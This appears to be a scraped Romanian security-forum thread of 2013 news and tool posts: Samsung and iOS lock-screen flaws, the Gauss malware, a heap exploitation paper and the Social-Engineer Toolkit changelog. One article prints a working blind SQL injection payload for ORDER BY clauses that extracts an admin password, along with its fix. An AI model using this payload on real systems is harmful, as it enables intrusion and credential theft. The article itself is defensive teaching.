Nytro

Aveti de facut in C++ o functie care primeste niste date de intrare, nu conteaza ce, iar ca rezultat va avea un buffer (care contine cine stie ce date, nu e important) de dimensiune necunoscuta la apelul functiei. Cum ar arata pentru voi cel mai bine prototipul pentru acea functie: 1. Functia intoarce bool daca s-a efectuat cu succes si scrie datele la o adresa PREalocata, inainte de apelul functiei: bool Functie(int DateIntrare, char *Buffer, int &DimensiuneAlocata); Parametrul "DimensiuneAlocata" va fi transmis prin referinta si dupa apelul functiei va contine numarul de bytes folositi de functie. Problema e ca functia poate necesita mai multi octeti decat sunt prealocati, astfel datele vor fi trunchiate. 2. Functie care intoarce un pointer la datele ALOCATE DE FUNCTIE (deci vor trebui ulterior eliberate de utilizator) si un parametru transmis prin referinta care va contine dimensiunea datelor alocate: char *Functie(int DateIntrare, int &DimensiuneAlocata); 3. Functia va intoarce numarul de octeti alocati si va primi ca parametru o referinta la pointerul pe care il va aloca intern, urmand ca datele sa fie eliberate de utilizator. int Functie(int DateIntrare, char *& Buffer); Bine, sunt MULT mai multe variante. Voi pe care o preferati si de ce? Sper ca ati inteles la ce ma refer...

Alte informatii: New! Samsung Security Flaw – Disable Lockscreen – Total Control | Terence Eden has a Blog

BOPFunctionRecognition This python/jython script is used as plugin to BinNavi tool to analyze a x86 binanry file to find buffer overflow prone functions. Such functions are important for vulnerability analysis. — Read more Introduction: ============= The following abstract from the original paper "Sanjay Rawat and Laurent Mounier, "Finding Buffer Overflow Inducing Loops in Binary Executables", In Proc. of the IEEE International Conference on Software Security and Reliability (SERE) 2012, June 2012, Washington DC, USA", gives the hint about this tool: Abstract—Vulnerability analysis is one among the important components of overall software assurance practice. The main aim of vulnerability analysis is to find patterns in software that indicate possible vulnerabilities. Buffer overflow (BoF) is one of such vulnerabilities that has managed to top the list of vulnerabilities. A general practice to find BoF is to look for the presence of certain functions that manipulate string buffers. strcpy family of C/C++ functions is an example of such functions. A simple analysis of such functions reveals that data is moved from one buffer to another buffer within a loop without considering destination buffer size. We argue that similar behaviour may also be present in other functions that are coded separately and therefore, are equally vulnerable. In the present report, we investigate the detection of such functions by finding loops that exhibit similar behavior. We call such loops as Buffer Overflow Inducing Loops (BOIL) mainly from buffer overflow vulnerability standpoint. We implemented our solution and analyzed it on real-world x86 binary executables. The results obtained show that this (simple but yet efficient) vulnerability pattern may provide a drastic reduction of the part of the code to be analysed, while allowing to detect real vulnerabilities. Software Requirements: ===================== 1. BinNavi Version 4 (Note: version 3 uses MySQL databases, whereas from v4 onwards, BinNavi uses PostGreSQL) 2. IDA Pro v 6 3. Jython Installation: ============ No installation as such. In order to anlayze a binary file, follow the steps: A- Creating IDA pro IDB file 1. drag-n-drop executable into the opened IDA Pro pane. 6. In the following IDA pro window, uncheck "make imports segment" and then OK. 7. Wait until IDApro finishes its analysis and then close IDApro. It will ask to save the analysis and choose "yes" 8. The previous step will create a test.idb file in the same folder where exe resides. B- Importing IDB file to BinNavi 1. In Windows, go to the directory of BinNavi. 2. Double click on BinNavi.bat. It will open BinNavi GUI 3. In the BinNavi windows, double click on BinNavi1 DB sign (left top sidebar). 4. It will make connection to DB and will unfold the BInNavi1 DB field. 5. Click on "modules" which lists all the loaded modules in BinNAvi. 6. Right click on "MOdules" and choose "import IDB file". It will open another windows. 7. By traversing "Look in => HOme (symbol)", goto the folder and select the test.idb file and then press ">>" sign. Click import. 8. Once imported, test.exe will appear int he "Module" tree. Double click on this. 8. This will open another window, which has functions defined in the module (lower right pane). By double clicking on any function address, you can open this function graph. this step is not required for our purpose i.e. for API based script. 9.Just run the provied script as > jython BOPFunctionRecognition_simple.py and follow the instructions thereafter. The output of the script is two files 1. file with results describing the functions that are BOP functions along with loop information (at assembly level) 2. a pickle file that have a list of BOP function. NOTE: ===== The provided script is absolutely an unoptimized version and there are many things that can be improved a lot (both code and algorithm wise). We'll be updating it form time to time and also anticipate volunteers to suggest. Please write me mails if you would like to participate or contribute. Thanks Sanjay Rawat sanjayr@ymail.com Download: https://github.com/tosanjay/BOPFunctionRecognition

Linux community adopts UEFI technology The Unified Extensible Firmware Interface (UEFI) Forum, a world-class, non-profit industry standards body of leading technology companies that promotes firmware innovation by creating specifications that enable the continual evolution of platform technologies, is gaining momentum as use of UEFI specifications increases in Linux-based operating systems, such as Ubuntu 12.10, Fedora 18 and OpenSUSE 12.3. UEFI specifications enable cross-functionality between devices, software and systems. By design, UEFI technology lends itself to utility and applicability across a range of platforms. Including UEFI Secure Boot in Linux-based distributions allows users to boot alternate operating systems without disabling UEFI Secure Boot. It also allows users to run the software they choose in the most secure and efficient way possible, promoting interoperability and technical innovation. UEFI specifications are designed to enhance security and standardization while allowing a speedier boot time. Companies responsible for delivering backup and disaster recovery for servers, desktops, laptops and virtual machines rely on robust UEFI technology to ensure crucial data remains protected under all circumstances. In the event of a system outage, use of UEFI technology reduces downtime and loss of revenue. “The increasing use of UEFI technology in Linux and proprietary systems is a testament to its ability to deliver next-generation technologies for nearly any platform,” said Mark Doran, president, UEFI Forum. “It’s exciting to watch UEFI enable the evolution of firmware technology in a variety of sectors as it continues to gain momentum.” Sursa: Linux community adopts UEFI technology

E cel mai bun, cu un singur click, daca site-ul e vulnerabil, iti afiseaza datele de logare ale administratorilor.

[h=2]PHP Security – Escape proof SQL injection in ORDER BY clause[/h] http://xkcd.com/327/ It’s a well known, well documented, and well abused fact that SQL injection attacks can take place in the WHERE clause of a SQL statement. The commonly applied practice among professionals is to run user input through mysql(i)_real_escape_string(). However, this only protects against user variables within quoted values, and does not protect against SQL injection attacks elsewhere in the query. One place that is commonly vulnerable is in the ORDER BY clause. Many developers either do not understand that mysql(i)_real_escape_string does not protect them from these types of attacks, or do not think that meaningful SQL injection can be done at this point in the query on a single statement engine like MySQL. As a result, this vulnerability can be found and exploited in many applications and websites, both commercial and open source, personal and corporate. Vulnerable code and SQL queries is basically: <php $sortColumn = mysqli_real_escape_string($_GET['sort_column']); $query ="SELECT * from some_table WHERE active = true ORDER BY $sortColumn DESC"; ?> This is vulnerable to a SQL injection attack that will allow a hacker to get information from any table in the database, whether it’s usernames, passwords, credit card account numbers, etc. [h=2]How this can be exploited[/h] The core theory behind the exploit is that this vulnerable query allow you to test a tiny piece of information from anywhere in the database in a boolean query that doesn’t rely on any unescaped characters, then use the value of that boolean to visibly change the output of the query. Assume that the vulnerable site is a news site and lets you sort the article listings by the date or title column. When you click on the column header you want to sort by, it sends a ‘sort_column’ parameter to the above script of either ‘date’ or ‘title’. If instead of sending ‘date’ or ‘title’, you sent something like the following string, you would be able to start reading information from anywhere in the database. In this particular case, we’ll try the users table. (CASE WHEN (SELECT ASCII(SUBSTRING(password, 1, 1)) FROM users where username = 0x61646D696E) = 65 THEN date ELSE title END) Assuming that this is the correct table and column names, this injection will allow you to tell whether or not the first character of the admin user’s password is ‘A’. If it is, the article list will be returned sorted by date. If not, it will be returned sorted by title. If it isn’t a match, then the 65 in the query just needs to be incremented/decremented until the match is made to try other various letters/symbols. Once the match is made and the first character is discovered, the substring offset just needs to be incremented to get the second character, but this time starting with null to see if the end of the string has already been reached. If not, start back at 65, and repeat the process until null matches. This does require some knowledge about the database schema, which can be guessed, looked up on open source applications, or can be learned by first querying against a known table like the information schema. A script can be written to do automate this process very quickly, as an 8 character password with upper and lowercase letters and numbers can be discovered with a maximum of 500 queries. MD5 encoded passwords will have the hashes revealed in less than 512 queries, which can then be brute force decoded (at over 500 million attempts/second, thanks to GPU computing), or directly looked up if the password is a common word or phrase. [h=2]Why This Works[/h] Because each of these queries puts user input in a place in the query that is not enclosed with ‘, there is no need to use any of the characters that would be escaped by mysql(i)_real_escape_string(). Instead, SQL can be directly passed directly into the query. In places that strings are normally used when making a query, Hex notation, ASCII or other character conversion can be used to convert strings to or from their numeric values. As demonstrated in these examples, anywhere that SQL can be injected into a query is a major security vulnerability. [h=2]How to Secure[/h] Securing this type of query is a rather simple process. If a column name is expected, the user input should be validated against a whitelist array. Applying this on the example query: <php $columns = array( 'title', 'date' ); if (in_array($_GET['sort_column'], $columns)) { $sortColumn = $_GET['sort_column']; } else { $sortColumn = 'title'; } ?> As you can see, the above code will ensure that only expected/allowed values make it through to the database. So remember, trust no one, and sanitize everything, regardless of how harmless you may think invalid input will be. Sursa: Joseph Keeler

[h=2]Social-Engineer Toolkit (SET) v4.7 – Codename “Headshot” Released.[/h] The Social-Engineer Toolkit (SET) version 4.7 codename “Headshot” has been released. This version of SET introduces the ability to specify multi-powershell injection which allows you to use as many ports as you want. SET will automatically inject PowerShell onto the system on all of the reverse ports outbound. What’s nice with this technique is it never touches disk and also uses already whitelisted processes. So it should never trigger anything like anti-virus or whitelisting/blacklisting tools. In addition to multi-powershell injector, there are a total of 30 new features and a large rewrite of how SET handles passing information within different modules. Changelog: ~~~~~~~~~~~~~~~~ version 4.7 ~~~~~~~~~~~~~~~~ * removed a prompt that would come up when using the powershell injection technique, port.options is now written in prep.py versus a second prompt with information that was already provided * began an extremely large project of centralizing the SET config file by moving all of the options to the set.options file under src/program_junk * moved all port.options to the central routine file set.options * moved all ipaddr.file to the central routine file set.options * changed spacing on when launching the SET web server * changed the wording to reflect what operating systems this was tested on versus browsers * removed an un-needed print option1 within smtp_web that was reflecting a message back to user * added the updated java bean jmx exploit that was updated in Metasploit * added ability to specify a username list for the SQL brute forcing, can either specify sa, other usernames, or a filename with usernames in it * added new feature called multi-powershell-injection – configurable in the set config options, allows you to use powershell to do multiple injection points and ports. Useful in egress situations where you don’t know which port will be allowed outbound. * enabled multi-pyinjection through java applet attack vector, it is configured through set config * removed check for static powershell commands, will load regardless – if not installed user will not know regardless – better if path variables aren’t the same * fixed a bug that would cause linux and osx payloads to be selected even when disabled * fixed a bug that would cause the meta_config file to be empty if selecting powershell injection * added automatic check for Kali Linux to detect the default moved Metasploit path * removed a tail comma from the new multi injector which was causing it to error out * added new core routine check_ports(filename, ports) which will do a compare to see if a file already contains a metasploit LPORT (removes duplicates) * added new check to remove duplicates into multi powershell injection * made the new powershell injection technique compliant with the multi pyinjector – both payloads work together now * added encrypted and obfsucated jar files to SET, will automatically push new repos to git everyday. * rewrote the java jar file to handle multiple powershell alphanumeric shellcode points injected into applet. * added signed and unsigned jar files to the java applet attack vector * removed create_payload.py from saving files in src/html and instead in the proper folders src/program_junk * fixed a payload duplication issue in create_payload.py, will now check to see if port is there * removed a pefile check unless backdoored executable is in use * turned digital signature stealing from a pefile to off in the set_config file * converted all src/html/msf.exe to src/program_junk/ and fixed an issue where the applet would not load properly Download: https://www.trustedsec.com/downloads/social-engineer-toolkit/ Sursa: https://www.trustedsec.com/march-2013/social-engineer-toolkit-set-v4-7-codename-headshot-released/

+ St. Patrick’s Day Through Google Glass | Google Glass APPs

[h=2]How Guys Will Use Google Glass[/h] Once Google Glass does not require voice recognition and is completely discreet then, and only then, will the true creepsters embrace said technology. Until that time, they’ll only begrudgingly embrace it. Sursa: How Guys Will Use Google Glass | Technology | Dueling Analogs - Video

Advanced Heap Manipulation in Windows 8 Zhenhua(Eric) Liu zhliu@fortinet.com VERSION 1.0 Contents ABSTRACT ...................................................................................................................................................... 3 Prior Works ................................................................................................................................................... 4 Introduction .................................................................................................................................................. 5 Sandbox ..................................................................................................................................................... 5 Windows 8 Kernel Exploit mitigation improvements ............................................................................... 5 Heap feng shui and Windows 8 ................................................................................................................ 6 What Feng shui really is ............................................................................................................................ 7 What’s left? ............................................................................................................................................... 7 Uninitialized memory reference ........................................................................................................... 7 Application specific attacks ................................................................................................................... 7 Custom Memory Allocator .................................................................................................................... 8 The future ................................................................................................................................................. 8 Quick View of the Idea .................................................................................................................................. 9 Basics ......................................................................................................................................................... 9 Freelists ................................................................................................................................................. 9 Three ways could write into the FreeLists .......................................................................................... 10 Allocation Search ................................................................................................................................ 10 Splitting Pool Chunks process ............................................................................................................. 11 The Mandatory Search Technique .......................................................................................................... 12 Kernel Pool .................................................................................................................................................. 14 Implementation in Kernel Pool ............................................................................................................... 15 Basics ................................................................................................................................................... 15 Reliability Notes .................................................................................................................................. 17 Putting It All Together ......................................................................................................................... 21 User Heap .................................................................................................................................................... 22 Implementation in User Heap ................................................................................................................. 22 Applicable circumstance ..................................................................................................................... 25 Prerequisites ....................................................................................................................................... 25 The simple idea ................................................................................................................................... 26 Practices in User heap ............................................................................................................................. 28 A practical attack on _HEAP_USERDATA_HEADER ............................................................................. 28 Uninitialized memory reference ......................................................................................................... 29 Practical heap determining in IE 10 .................................................................................................... 29 Conclusion ................................................................................................................................................... 31 Acknowledgements ..................................................................................................................................... 31 Bibliography ................................................................................................................................................ 32 Attacking _HEAP_USERDATA_HEADER Source Code.................................................................................. 33 Download: https://media.blackhat.com/eu-13/briefings/Liu/bh-eu-13-liu-advanced-heap-WP.pdf

[h=1]Chamelon – o re?ea botnet cu impact financiar de 6 milioane de dolari lunar[/h] Publicat de Andrei Av?d?nei în Securitate · ?tiri — 20 Mar, 2013 at 2:49 pm Chamelon este un botnet descoperit de spider.io, research-ul venind la foarte scurt timp de la închiderea botnet-ului Bamital de Microsoft ?i Symantec pe 6 februarie 2013. Chamelon s-a remarcat prin faptul c? are un impact financiar extrem de mare, fiind estimate ni?te costuri pentru advertiseri de peste 6 milioane de dolari lunar, cu 70% mai costisitor decât botnetul Bamital. De asemenea, e de remarcat faptul c? reclamele ce le pune Chamelon sunt foarte mari, spre deosebire de link-uri cu text în cazul precedent. Chamelon ruleaz? algoritmi de complexitate variat? pentru a gestiona reclamele într-un mod cat mai apropiat de tema site-urilor ce sunt accesate. Este foarte impresionat nivelul de sofisticare ?i mecanismele de evitare a sistemelor de detec?ie. Calculatoarele pe care ruleaz? Chamelon sunt ma?ini cu Microsoft Windows ca sistem de operare. Computerele infectate acceseaz? WWW-ul printr-un browser Trident cu Flash activat ce execut? Javascript. Pân? acum au fost identificate peste 120,000 de ma?ini infectate, 95% dintre acestea având IP-uri de SUA. Mai multe detalii despre acest subiect g?sim pe spider.io. — Andrei Av?d?nei Sursa: Chamelon – o re?ea botnet cu impact financiar de 6 milioane de dolari lunar | WorldIT

[h=1]New Samsung flaw allows 'total bypass' of Android lock screen[/h]Summary: Another day, another lock screen flaw. Some Samsung devices running Android 4.1.2 can allow a 'total bypass' of the device's lock screen. By Zack Whittaker for Zero Day | March 20, 2013 -- 12:10 GMT (05:10 PDT) Another security flaw has been discovered on some Samsung phones that allows complete access to a device. Discovered by the same mobile enthusiast as the previous flaw, Terence Eden warns that this new bug could allow users to bypass the lock screen entirely through the use of third-party apps. This affects pattern unlocks, PIN code screens, and face detection security. The flaw was tested on a Samsung Galaxy Note II running Android 4.1.2 as before — but it does not appear to exist on stock Android from Google, suggesting this is limited to Samsung phones only. This flaw may exist in other Android phones, notably Samsung devices, and users and IT managers alike should test their devices immediately. The method involves much of the same steps as before, and involves having direct access to the device. Also, the methodology may include repeating some steps, so by far this is not an easy way to gain unauthorized access to a Samsung device. From the lock screen, an attacker can enter a fake emergency number to call which momentarily bypasses the lock screen, as before. But if these steps are repeated, the user has enough time to go into the Google Play application store and voice search for "no locking" apps, which then disables the lock screen altogether. From there, the device is left wide open. Here's the video: Eden said that he disclosed this to Samsung in late February, but unlike last time, the Korean giant responded. A software fix to this lock screen bypass will be "released shortly," according to Eden. It comes only a few weeks after a similar flaw was discovered in the lock screen of Apple's iPhone in iOS 6.1. This was fixed on March 19, more than a month after it was first discovered. Samsung did not fix the original lock screen bug, leaving millions of devices potentially at risk from privacy invasion. More worryingly, now a similar flaw can open up the device completely. For now, only a third-party ROM can prevent such attacks. According to Eden, one software ROM designed for the Galaxy S III claims to have fixed the problem. Sursa: New Samsung flaw allows 'total bypass' of Android lock screen | ZDNet

Exploiting Software How to Break Code By Greg Hoglund Gary McGraw Publisher: Addison Wesley Pub Date: February 17, 2004 ISBN: 0-201-78695-8 Pages: 512 How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers. Exploiting Software is loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out. This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about Why software exploit will continue to be a serious problem When network security mechanisms do not work Attack patterns Reverse engineering Classic attacks against server software Surprising attacks against client software Techniques for crafting malicious input The technical details of buffer overflows Rootkits Download: http://par-anoia.net/assessment/books/security/Exploiting Software - How to Break Code - G. Hoglund, et al., (Addison-Wesley, 2004) WW.pdf

Guvernul organizeaza primul Hackathon din Romania Tema: Miercuri, 20 februarie 2013 În acest week-end, sediul Guvernului devine locul de desf??urare al primului „maraton de programare” din România – Hackathon. Astfel, timp de dou? zile, 28 de elevi vor dezvolta aplica?ii, pagini web ?i interfe?e cu ajutorul Bitdefender ?i Microsoft, partenerii evenimentului, în încercarea de a aduce administra?ia public? mai aproape de cet??ean ?i de a responsabiliza guvernan?ii prin deschidere ?i transparen??. Cele cinci proiecte dezvoltate în cadrul acestui maraton centralizeaz? informa?ii de interes public. Acestea vor fi: • Buget.gov.ro – datele privind bugetul de stat ?i vizualizarea lor într-o forma u?or de în?eles • Angajati.gov.ro – datele privind angaja?ii din administra?ia public? • Posturi.gov.ro – datele privind posturile vacante scoase la concurs în administra?ia public? • Petitii.gov.ro – ini?iativele cet??enilor, pe domenii de interes • Data.gov.ro – faciliteaz? accesul publicului la datele incluse în platformele de mai sus La aceast? prim? edi?ie vor participa elevi cu rezultate foarte bune la concursurile de informatic?, a caror selec?ie a fost realizat? de c?tre Ministerul Educa?iei. Sursa: Guvernul organizeaza primul Hackathon din Romania Deci: 1. Programatorii sunt scumpi, punem niste copii sa lucreze pentru noi atrasi de termenul "hackathon" (care evident e folosit in mod incorect) 2. Ne plangem ca site-urile guvernamentale sunt vulnerabile la orice rahat si ca Vasile pune pe homepage "Mata-i grasa" PS: Daca ne dau pizza si bere ma gandesc sa ma duc si eu. PS 2: Ma gandesc sa merg si sa las si un backdoor pe acolo. (nu va mai dau idei)

[h=3]Owning Samsung phones for fun (...but with no profit )[/h]I was planning to open a blog since some months, but I decided to do it only now, to summarize some of the findings of a quick look I gave at a couple of Samsung Android devices. But let's start at the beginning. During last Christmas holidays I finally had some free time to try to better understand the inner workings of some Samsung devices, focusing on the manufacturer's customizations to the Android system. I confess I was quite surprised to see how many Samsung applications are included in the original firmware image, including several customizations to lots of Android core packages. To make a long story short, I soon started to find some exploitable bugs, affecting both "old" device models (e.g., my Galaxy Tab GT-P1000) and newer devices (e.g., my Galaxy S3). All these issues were caused by Samsung-specific software or customizations. I must say I have nothing against Samsung: on the contrary I'm a happy Samsung customer, and I think their phones and tablets are quite cool, probably among the best devices around. However, their market share is making them an attractive target for attackers. I contacted Samsung at the beginning of January 2013, and on January 17th I gave them all the technical details and proof-of-concepts for the six vulnerabilities I found, plus some bonus denial-of-services and info leaks (for the sake of completeness, the MD5 of my report is af7ca8998079c5445a3b1bcff2e05f90). Since then, I have not received any official confirmation from Samsung about their intention to fix these issues: as far as I know, they are still "in the process of checking for the vulnerabilities". Despite this fact, on February 20th, they asked to delay my public disclosure until proper patches are developed, considering that "any patches [samsung] develops must first be approved by the network carriers". In the past, I have always followed a responsible disclosure policy to report the vulnerabilities I have found, but waiting until (all?) the network carriers approve a security patch seems to be a very, VERY, long time! Nevertheless, to avoid exposing Samsung users to possible threats, I won't disclose any technical detail, but I think it is acceptable to provide just a high-level overview of the issues. [h=4]Scenario[/h] All the vulnerabilities I reported can be exploited from an unprivileged local application. In other words, no specific Android privileges are required for the attacks to succeed. This allows attackers to conceal the exploit code inside a low-privileged (and apparently benign) application, distributed through Google Play or the Samsung Apps market. I would like to stress out one more time that these issues are not caused by bugs inside the "vanilla" Android system, but are all caused by Samsung-specific software and customizations. [h=4]Issues overview[/h] As I discussed before, no technical details will be provided. In this paragraph I will just sketch out a high-level description of the issues I found and their possible impacts. Two different vulnerabilities can be exploited to silently install highly-privileged applications with no user interaction. The privileged applications to be installed can be embedded right inside the unprivileged application package, or downloaded "on the fly" from an on-line market. Another issue, different from the previous ones, allows attackers to send SMS messages without requiring any Android privilege (normally, Android applications are required to have the android.permission.SEND_SMS permission to perform this task). An additional vulnerability can be used to silently perform almost any action on the victim's phone, ranging from placing phone calls to sending e-mails, SMS messages, and so on. The remaining security issues allow attackers to change other settings of the victim's phone, such as networking or Internet settings, without the user's consent. [h=4]Proof-of-concept[/h] A video that shows the exploitation of one of the issues discussed at point 1 (stealth installation of a privileged application) is shown below. I know the video is quite meaningless, but it is all I can disclose right now. I'm also sorry for the poor video quality , but it turned out that recording an Android screen video with a good fps rate is more difficult than finding 0-days . The video was taken using my Samsung Galaxy Tab, updated with the latest Samsung firmware and applications available at the time of writing. A similar vulnerability (but not the very same one) also affects the Galaxy S3 and probably other more recent devices. The video is organized as follows: An application named "Hacksung" is installed on the target device. At the beginning of the video I show that "Hacksung" has no specific permissions. Application "Hacksung" is executed and the exploit is launched when the "Pwn!" button is pressed. The exploit installs a second app, named "Malicious", embedded inside the "Hacksung" application package. As you can see from the video, no user confirmation is requested. The application "Malicious" is run. This application does nothing, and it simply displays a text message. To conclude, the video shows the permissions granted to "Malicious". As can be seen, several dangerous permissions are granted, such as the ability to read and send SMS messages. [h=4]Some final observations[/h] The ability to silently install privileged applications or to send SMS messages are quite appealing tasks for mobile malware authors and, to make things even worse, most of the issues I reported to Samsung are also pretty easy to find. As a consequence, I won't be surprised to find some malware in the wild that exploits these or similar vulnerabilities. Considering that most of these bugs can be fixed quite easily, without any drastic change to the device software, I admit that I was expecting a quick patch from Samsung. However, two months were not enough even to start the development of a security fix, and I don't think any patch will be released anyway soon. I really think Samsung cares about the security of its customers, but probably its vulnerability handling procedure should be revised a little bit. Smartphones, tablets and other portable devices are tomorrow's computing platform, and Android is one of the leading actors of this change. As a natural consequence, Android malware is also rapidly growing. In this situation, the prompt development and diffusion of security patches is simply mandatory. Sursa: Roberto Paleari's blog: Owning Samsung phones for fun (...but with no profit )

Hash Generator [TABLE] [TR] [TD][TABLE=width: 100%] [TR] [TD=align: justify]Hash Generator is the FREE universal hash generator tool which automates the generation of 14 different type of hashes or checksums. It support most of the popular hashes including MD5 family, SHA family, BASE64, LM, NTLM, CRC32, ROT13, RIPEMD, ALDER32, HAVAL, WHIRLPOOL etc. [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 100%] [TR] [TD=align: justify] It can even generate hash for the file as well as text input also. User can directly enter or paste any text from clipboard and generate hash. It also supports 'Drag & Drop interface' which allows you to quickly drag files onto the tool for hash generation. Hashes or checksums are mainly used for file integrity verification. Often files downloaded from Internet are checked with MD5/SHA256 hash to make sure file is not tempered. Hashes are also used in encryption and storage of password as well as other sensitive data to protect it from the spying eyes. HashGenerator helps in quickly computing or verifying the hash for any such file or password text. It works on wide range of platforms starting from Windows XP to latest operating system Windows 8. [/TD] [/TR] [/TABLE] [/TD] [/TR] [/TABLE] http://www.youtube.com/watch?v=ImBdB0aPjMs&feature=player_embedded Download: http://securityxploded.com/download.php#hashgenerator Sursa: Hash Generator : All-in-one Tool to Generate Hash MD5/SHA1/SHA256/SHA512/BASE64/LM/NTLM/CRC32 | www.SecurityXploded.com

[h=1]Apple's New iOS Update Blocks Evasi0n Jailbreak--After It's Been Used About 18 Million Times[/h]After 43 days of jailbreaking frenzy, Apple has closed the cell doors again. The latest 6.1.3 update to iOS released Tuesday includes a patch that prevents the use of the hacking tool evasi0n, which since early February has become the most popular program ever for “jailbreaking” phones and tablets to remove their software restrictions. David Wang, one of the four hackers who created evasi0n, confirms that the new update includes a patch for a bug in iOS’s time zone settings, one of a series of vulnerabilities that allowed users to dismantle the iPhone’s and iPads’ considerable security measures. Wang first spotted the bug fix in the beta version of the update released to developers last month. Update: In fact, Apple writes in notes accompanying the update that it has fixed six bugs in total, and graciously credits the hackers behind evasi0n with making the company aware of four of them. In the six weeks since evasi0n was released, however, close to 18 million devices have already been jailbroken, according to data from Jay Freeman, the administrator of the Cydia app store for jailbroken devices. He says he’s counted 18.2 million unique devices running iOS 6 visiting Cydia, including 13.8 million iPhones, 3.4 million iPads, and 1.1 million iPod Touches. Those numbers vastly exceed previous jailbreaks such as Jailbreakme 3, a popular hacking tool for iOS released in the summer of 2011 that was used on around 2 million devices, according to a count at the time by creator Nicholas Allegra. Aside from blocking evasi0n, the update also fixes a bug in iOS that let anyone to bypass an iPhone’s lockscreen using its emergency call function, allowing partial access to the phone’s private data and even to make calls. Compared to some previous jailbreaks, Apple took its time in patching evasi0n. By contrast, the company took only nine days to fix the bugs exploited by Jailbreakme 3. But that tool allowed anyone to jailbreak his or her phone or tablet simply by visiting a website, creating the risk that it would be repurposed by malicious hackers to perform “drive-by downloads” of malware onto Apple devices that visited an infected website. Evasi0n, on the other hand, requires a USB connection between the device being jailbroken and a PC, vastly reducing the risk that it could be used for malicious purposes. “If there’s no injection vector they know about that lets you activate the attack through drive-by, [Apple doesn't] seem to put much priority on it,” says Wang. Wang says that at least one of the bugs used in evasi0n remains in Apple’s mobile operating system. And he’s told me previously that the hacker team who cooperated on evasi0n, known as the evad3rs, has a backup supply of secret bugs in iOS that they’re saving for future jailbreak tools. It’s unclear how many of those bugs might be patched in iOS 6.1.3. But for now, anyway, they don’t plan to waste them on creating a new tool. “We’ll probably wait until the next major release,” says Wang. That means any user who updates to iOS 6.1.3 will lose the ability to jailbreak his or her phone for months or possibly years to come. But Wang says there’s still no fix available to jailbreakers for the lockscreen vulnerability that’s also patched in this update. So any jailbreak fan who foregoes Apple’s latest update should also take extra care not to let their phone out of their sight. Sursa: Apple's New iOS Update Blocks Evasi0n Jailbreak--After It's Been Used About 18 Million Times - Forbes

Puzzle box: The quest to crack the world’s most mysterious malware warhead State-sponsored Gauss contains secret warhead eluding global cracking experts. by Dan Goodin - Mar 14 2013 It was straight out of your favorite spy novel. The US and Israel felt threatened by Iran's totalitarian-esque government and its budding nuclear program. If this initiative wasn't stopped, there was no telling how far the growing conflict could escalate. So militaries from the two countries reportedly turned to one of the most novel weapons of the 21st century: malware. The result was Stuxnet, a powerful computer worm designed to sabotage uranium enrichment operations. When Stuxnet was found infecting hundreds of thousands of computers worldwide, it was only a matter of time until researchers unraveled its complex code to determine its true intent. Today, analysts are up against a similar challenge. But they're finding considerably less success taking apart the Stuxnet cousin known as Gauss. A novel scheme encrypting one of its main engines has so far defied attempts to crack it, generating intrigue and raising speculation that it may deliver a warhead that's more destructive than anything the world has seen before. Gauss generated headlines almost immediately after its discovery was documented last year by researchers from Russia-based antivirus provider Kaspersky Lab. State-of-the-art coding techniques that surreptitiously extracted sensitive data from thousands of Middle Eastern computers were worthy of a James Bond or Mission Impossible movie. Adding to the intrigue, code signatures showed Gauss was spawned from the same developers responsible for Stuxnet, the powerful computer worm reportedly unleashed by the US and Israeli governments to disrupt Iran's nuclear program. Gauss also had links to the highly advanced Flame and Duqu espionage trojans. Gauss contains module names paying homage to the German mathematicians and scientists Johann Carl Friedrich Gauss, Kurt Friedrich Gödel, and Joseph-Louis Lagrange. Its noteworthy features only start there. Gauss has the ability to steal funds and monitor data from clients of several Lebanese banks, making it the first publicly known nation-state sponsored banking trojan. It's also programmed to collect a dizzying array of information about the computers it infects—including its network connections, processes and folders, BIOS, CMOS, RAM, and both local and removable drives. But the most intriguing characteristic of Gauss is an encrypted payload that has so far remained undeciphered, despite the best efforts of cryptographers who have already tried millions of possible keys. Tucked deep inside the Gödel module, the secret warhead is loaded onto USB sticks and removable drives when they're connected to Gauss-infected machines. When the drives are plugged into an uninfected computer later, the mysterious code is executed—but only if it encounters the specific machine or machines targeted by the Gauss developers. On every other computer, the module remains cloaked in an impenetrable envelope that prevents researchers and would-be copycats from reverse engineering the code. The extreme stealth has stoked speculation that the payload may contain a potent exploit that could rival the Stuxnet attack that was bent on destroying uranium centrifuges inside Iran's high-security Natanz enrichment facility. Certainly not your everyday malware. "Considering the link with Flame and Stuxnet, the payload of Gauss must be of similar magnitude," Costin Raiu, director of Kaspersky Lab's global research and analysis team, told Ars. "Given how careful the attackers were to make sure the Gauss payload doesn't fall into the 'wrong' hands, we can assume it is very special." Enlarge / The Gauss architecture. Kaspersky Lab Built to last Gauss is by no means the first malware with a payload that was programmed to remain dormant unless it was installed on computers meeting a narrow set of criteria. Stuxnet also contained code instructing it to destroy uranium-enrichment centrifuges only when they were physically located at Natanz. Researchers have theorized that the trigger was implemented to reduce the chances of collateral damage that might result if Stuxnet took hold in other facilities. (The precaution proved wise, since Stuxnet infected more than 100,000 computers scattered all over the globe.) But as cryptographer Nate Lawson observed more than two years ago, the mechanism Stuxnet used to protect unintended targets from destruction was surprisingly crude for an otherwise advanced cyberweapon developed by countries with almost unlimited budgets. The coding techniques were largely limited to conditional "if/then" range checks that identified computers running German conglomerate Siemens's Simatic Step7 software inside Natanz. If an infected computer met the criteria, the sabotage payload was activated. If not, the exploit sat dormant. Noticeably absent from Stuxnet was any kind of mechanism preventing researchers, enemies, or potential copycat programmers from peering inside the malware to see what the highly selective payload did. That's precisely what security experts such as Ralph Langner did following the Stuxnet discovery. Within a few weeks, the world had its answer: Stuxnet was a powerful cyberweapon unleashed by a well-resourced government bent on sabotaging Iran's nuclear program. While the developers may have taken care to prevent the worm from attacking other countries, they did little to conceal the true aim and methods of their malware, which attacked programmable logic controllers at the heart of the enrichment process. "Encrypting your payload so that only the intended target can decrypt it hides both the identity of the victim and the worm's purpose," Lawson recently told Ars. "If Gauss came after Stuxnet, it's clear the authors disliked the publicity its PLC [programmable logic controller] payload received and made an effort to hide it properly the second time." The notion of software containing a "secure trigger" isn't new either. Scientists such as Fritz Hohl theorized about it as early as 1998 in a paper titled "Time Limited Blackbox Security: Protecting 